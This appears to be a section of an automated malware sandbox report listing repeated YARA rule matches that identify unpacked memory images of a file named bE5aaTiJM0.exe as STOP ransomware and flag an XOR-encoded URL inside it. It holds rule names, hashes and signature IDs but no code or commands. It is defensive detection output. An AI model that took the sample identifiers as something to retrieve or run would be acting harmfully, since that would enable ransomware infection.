      Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
